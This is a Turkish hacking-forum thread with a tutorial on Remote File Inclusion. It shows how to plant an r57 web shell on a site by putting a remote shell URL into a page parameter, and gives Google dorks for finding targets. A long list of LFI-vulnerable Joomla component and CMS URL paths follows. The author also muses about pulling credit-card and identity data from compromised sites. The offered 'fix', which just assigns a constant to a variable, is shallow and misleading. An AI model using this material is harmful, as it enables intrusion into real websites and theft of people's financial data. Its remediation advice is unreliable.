Konuyu Oyla:
  • Derecelendirme: 4.33/5 - 3 oy
  • 1
  • 2
  • 3
  • 4
  • 5
RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork )
#1
Selamın Aleyküm Hayırlı Günler Arkadaşlar RFI açığından bahsedecem.


RFI Nedir?
Nasıl Bulunur?/Nasıl Shell Dahil Edilir/Sokulur?
RFI Açığının Bir Dorku Varmıdır?
LFI BuGs Dork
ve Sonrası...



RFI Açıkları Günümüzde Pek Rastlanmasada Her an Karşımıza Çıkabilecek Bir Saldırı Türüdür.

RFI Açığının Mantığı Uzaktan Dosta Dahil Etmektir.


Günümüzde RFI Açığı Basit Bir Açık Olarak Bilinir.Ama Basit Olduğu Kadar da Çok Tehlikelidir.

Bir Web Sayfası Düşünün ve Bu Web Sayfası PHP Diliyle Kodlanmış Olsun.Eğer Sayfayı Kodlayan Tasarımcı Acemi ise Hata Yapması Kaçınılmazdır.

RFI Nedir?


RFI (Remote File İnclude), Türkçesi Uzaktan Dosya Dahil Etme Anlanmına Gelmektedir.


Nasıl Bulunur?

1-) Hedef Sitenin Scriptini İndirerek RFI Açığı Aranabilir

2-) Hedef Siteyi Scanner ile Tarayarak RFI Açığı Bulunabilir.

2-) Hedef Site Üzerinde Manuel Olarak Aranarak RFI Açığı Bulunabilir.



1-) Hedef Sitenin Scriptinde RFI Açığı Aramak.


İndirdiğiniz Scriptin PHP İle Kodlandığını Varsayalım.RFI Taracağımız Dosyanın adı rfiscript.php olduğunu var sayıyoruz.

Kod:
<?php

include ($degisken. ’../function.php’);

?>
Bu Scriptte RFI Açığı Olduğunu Anlarız.Bu Scripti Bulduğumuz Sitede Açık Tarayabiliriz.Peki bu Açığı Nasıl Kaparız.?

Kod:
<?php

$degisken = ’data’;

include ($degisken. ’../function.php’);

?>

Açığı bu şekilde kapatırız.Ne Yaptık;

Sistemde kullanılmayan bir degisken isimile degişkene deger verdik.Hacker bu sayfada RFI Açığı tarattığında RFI Açığı bulamayacaktır..RFI Açığının bulunmasını engelledik..

2-) Hedef Siteyi Scanner Programları ile Tarayarak RFI Açığı Bulma.

Hedef Sitemizin Adı http://www.xxx.com olsun.Biz bu sitede RFI Açığının olup olmadığını anlamaya çalışacağız.Şimdi bir Web Security Scanner programı ile hedef sitemizi tarayacağız.Ben Örnek olsun diye bir program ismi veriyim.

Acunetix Web Vulnerability Scanner.Türkçesi Acunetix Web Güvenlik Açığı Tarayayıcısı gibi bişey. İngilizcem pek kuvvetli degildir.

Programımızla hedef sitemizi tarattığımızda sitede RFI Açığı olup olmadığınız zaten uyarı olarak size verecektir.Ama ben programla açık taratma taraftarı degilim.Çünkü bu işi siz ögreneceksiniz program degil..

2-)
Hedef Site Üzerinde Manuel(Elle) Olarak RFI Açığı Taramak.

Şimdi size tekrar hedef sitemiz olan http://www.xxx.com üzerinden manuel açık tarayamayı anlatacağım.

Sitemizde bir id değeri ararız.Buldugumuz id değerinde RFI açığı tararız.Nasılmı?

Kod:
www.xxx.com/sayfa.php?id=1

Gerekli olan bir şey daha belirteyim.Kendi hostunuza atılmış bir txt uzantılı shell..Oda http://www.sitemiz.com/r57shell.txt?

Şimdi hedef sitemizdeki id değerinin sonundaki rakam/harf/karakter herneyse siliyoruz ve kendi sitemizdeki txt uzantılı shell adresini yazıyoruz.

Kod:
www.xxx.com/sayfa.php?id=http://sitemiz.com/r57shell.txt?

ekrana r57shellimiz yansır ise bir RFI Açığı bulmuşsunuz demektir.Bir Screnn ile anlatayım bunu; (Shell yansıması)
www.deccal.org

Evet.Bu şekilde bir Shell yansıması olur ise hedef siteye shell sokulmuş demektir.

RFI Açığının Bir Dorku Varmıdır?

RFI Açığının belirli bir dorku yoktur.PHP ve ASP vs vs sayfalarda olabilir.Şimdi ben buraya binlerce dork yazabilirim ama zamanımız kısıtlı bu yüzden bir kaç örnek dork vereyim.

inurl:"page?id="

inurl:"open?id="

inurl:"go?id="


ve Sonrası...

Evet arkadaşlar.Bakalım neler öğrenmişiz ve daha neler yapabiliriz;

RFI’ın ne olduğunu, Açığı nasıl bulunacağını,Scriptte nasıl tespit edilin nasıl kapatılacağını, bulduğumuz açığı kullanıp nasıl shell sokabileceğimizi ve belli başlı RFI Dorklarını öğrendik.Şimdi gelin bu shell soktuğumuz siteye neler yapılabileceğine bakalım.

Sitemiz bir Finans sitesi olsaydı, Sitedeki Database bilgilerini çeker Tüm KrediKartları, Banka kartları vs bilgileri çekebilirdik.

KrediKartını ve Banka kartını çektiğimiz kişinin msn,facebook,twitter gibi sosyal medya hesaplarına ulabilirdik.Vatandaşlık numarasından tutun sülalesindeki bireylerin bile bilgilerini öğrenebilirdik.Ama yapmadık.Neden?; Bizim kul hakkında gözümüz yok.Sadece yapılabileceğini anlatalım dedik.Bence bir siteye girdiğinizde o siteye index basıp çıkmak yerine hacki daha eğlenceli hale getirebilmelisiniz.



LFI BuGs Dork

Kod:
!lfi submitComment.php?DOCUMENT_ROOT= submitComment.php
!lfi index.php?option=com_beeheard&controller= index.php?option=com_beeheard
!lfi index.php?option=com_arcadegames&controller= option=com_arcadegames
!lfi index.php?option=com_flashgames&controller= "option=com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "option=com_addressbook"
!lfi index.php?option=com_advertising&controller= index.php?option=com_advertising
!lfi /index.php?option=com_cvmaker&controller= /index.php?option=com_cvmaker
!lfi index.php?option=com_myfiles&controller= index.php?option=com_myfiles
!lfi index.php?option=com_onlineexam&controller= "option=com_onlineexam"
!lfi /index.php?option=com_joommail&controller= /index.php?option=com_joommail
!lfi /index.php?option=com_memory&controller= "option=com_memory"
!lfi index.php?option=com_market&controller= "?option=com_market"
!lfi index.php?option=com_diary&controller= index.php?option=com_diary
!lfi /index.php?option=com_worldrates&controller= option=com_worldrates
!lfi index.php?option=com_record&controller= index.php?option=com_record
!lfi index.php?option=com_sweetykeeper&controller= index.php?option=com_sweetykeeper
!lfi index.php?option=com_wgpicasa&controller= index.php?option=com_wgpicasa
!lfi /index.php?option=com_s5clanroster&view= /index.php?option=com_s5clanroster
!lfi index.php?option=com_photobattle&view= index.php?option=com_photobattle
!lfi index.php?option=com_mtfireeagle&controller= index.php?option=com_mtfireeagle
!lfi index.php?option=com_lovefactory&controller= index.php?option=com_lovefactory
!lfi index.php?option=com_jacomment&view= option=com_jacomment
!lfi index.php?option=com_delicious&controller= index.php?option=com_delicious&controller=
!lfi index.php?option=com_blogfactory&controller= index.php?option=com_blogfactory
!lfi index.php?option=com_sebercart&view= index.php?option=com_sebercart
!lfi index.php?option=com_jwhmcs&controller= index.php?option=com_jwhmcs
!lfi index.php?option=com_jukebox&controller= index.php?option=com_jukebox
!lfi index.php?option=com_joomlaflickr&controller= index.php?option=com_joomlaflickr
!lfi index.php?option=com_hsconfig&controller= index.php?option=com_hsconfig
!lfi index.php?option=com_fabrik&controller= index.php?option=com_fabrik
!lfi index.php?option=com_datafeeds&controller= index.php?option=com_datafeeds
!lfi /index.php?option=com_appointment&controller= /index.php?option=com_appointment
!lfi tools.php?p= powered by Plume CMS
!lfi index.php?option=com_awiki&controller= index.php?option=com_awiki
!lfi index.php?option=com_webeecomment&controller= index.php?option=com_webeecomment
!lfi index.php?option=com_realtyna&controller= index.php?option=com_realtyna
!lfi index.php?option=com_powermail&controller= index.php?option=com_powermail
!lfi /index.php?option=com_foobla_suggestions&controller= option=com_foobla_suggestions
!lfi index.php?option=com_pcchess&controller= index.php?option=com_pcchess
!lfi index.php?option=com_tweetla&controller= index.php?option=com_tweetla
!lfi index.php?option=com_ticketbook&controller= index.php?option=com_ticketbook
!lfi index.php?option=com_jfeedback&controller= index.php?option=com_jfeedback
!lfi index.php?option=com_jprojectmanager&controller= index.php?option=com_jprojectmanager
!lfi index.php?option=com_spsnewsletter&controller= index.php?option=com_spsnewsletter
!lfi index.php?option=com_alphauserpoints&view= ndex.php?option=com_alphauserpoints
!lfi index.php?option=com_travelbook&controller= index.php?option=com_travelbook
!lfi index.php?option=com_webtv&controller= index.php?option=com_webtv
!lfi index.php?option=com_horoscope&controller= index.php?option=com_horoscope
!lfi index.php?option=com_rd_download&view=download&cid= index.php?option=com_rd_download
!lfi /modules/pages/index.php?id= pL-PHP
!lfi index.php?option=com_abbrev&controller= index.php?option=com_abbrev
!lfi /index.php?modname= Docebo
!lfi bbcode_inputs.php?layout= bbcode_inputs.php
!lfi /index.php?p= JaxCMS
!lfi index.php?option=com_otzivi&controller= index.php?option=com_otzivi
!lfi /jsloader.php?files[]= jsloader.php
!lfi file.php?file[]= file.php
!lfi vbseo.php?vbseoembedd=1&vbseourl= vbseo.php
!lfi firstvisit.php?lang_global= firstvisit.php
!lfi /modules/hayoo/index.php?theme= TRIBISUR
!lfi index.php?option=com_juliaportfolio&controller= index.php?option=com_juliaportfolio
!lfi index.php?option=com_sbsfile&controller= index.php?option=com_sbsfile
!lfi index.php?option=com_gcalendar&controller= index.php?option=com_gcalendar
!lfi index.php?option=com_ninjarsssyndicator&controller= index.php?option=com_ninjarsssyndicator
!lfi index.php?option=com_rpx&controller= index.php?option=com_rpx
!lfi index.php?option=com_linkr&controller= index.php?option=com_linkr
!lfi index.php?option=com_janews&controller= option=com_janews
!lfi index.php?option=com_ganalytics&controller= index.php?option=com_ganalytics
!lfi index.php?option=com_sectionex&controller= index.php?option=com_sectionex
!lfi index.php?option=com_rokdownloads&controller= option=com_rokdownloads
!lfi index.php?option=com_rwcards&view=rwcards&controller= index.php?option=com_rwcards
!lfi index.php?option=com_news_portal&controller= index.php?option=com_news_portal
!lfi index.php?option=com_jinventory&controller= index.php?option=com_jinventory
!lfi index.php?option=com_wisroyq&controller= index.php?option=com_wisroyq
!lfi /index.php?option=com_redtwitter&view= /index.php?option=com_redtwitter
!lfi index.php?option=com_redshop&view= index.php?option=com_redshop
!lfi upload.php?language= upload.php?language=
!lfi index.php?option=com_weberpcustomer&controller= index.php?option=com_weberpcustomer
!lfi /index.php?option=com_userstatus&controller= option=com_userstatus
!lfi index.php?option=com_jvehicles&controller= index.php?option=com_jvehicles
!lfi index.php?option=com_econtent&controller= index.php?option=com_econtent
!lfi alpha.php?Absolute_Path= alpha.php?Absolute_Path=
!lfi payment.php?page_id= payment.php
!lfi index.php?option=com_dwgraphs&controller= index.php?option=com_dwgraphs
!lfi index.php?w= Pepsi CMS
!lfi index.php?action= index.php?action=
!lfi graph.php?go= "graph.php?go="
!lfi index.php?pg= "index.php?pg="
!lfi index.php?option=com_smestorage&controller= index.php?option=com_smestorage
!lfi index.php?option=com_properties&controller= index.php?option=com_properties
!lfi index.php?option=com_jeformcr&view= index.php?option=com_jeformcr
Beğenenler:
#2
Tebrikler
Beğenenler:
#3
Teşekkürler kiss
Beğenenler:
#4
Eline sağlık
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#5
teşekkürler kiss
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Sql Enjeksiyon Admin Authentication Login ByPass Geniş Resimli Videolu Anlatım KingSkrupellos 8 2,269 30-11-2016, Saat: 19:52
Son Yorum: Kolonkun
  2016 Güncel Exploit Dökümanı + Videolu Anlatım KingSkrupellos 2 225 30-11-2016, Saat: 11:11
Son Yorum: Efetimi
  SuspendedPage.Cgi Hacking Yöntemi Konu Anlatım KingSkrupellos 5 137 30-11-2016, Saat: 11:07
Son Yorum: Efetimi
  Sadrazam Shell'de Log Tespiti ve Log Kaydını Silme Yöntemi Detaylı Resimli Anlatım KingSkrupellos 9 273 29-11-2016, Saat: 15:41
Son Yorum: Efetimi
  Wordpress Rusça Taze 200 Dork Dark-Capar 48 1,742 27-11-2016, Saat: 20:24
Son Yorum: AhmetGazi
Anahtar Kelimeler

RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork ) indir, RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork ) Videosu, RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork ) Online izle, RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork ) Bedava indir, RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork ) Yükle, RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork ) Hakkında, RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork ) Nedir, RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork ) Free indir, RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork ) Oyunu, RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork ) Download


1 Ziyaretçi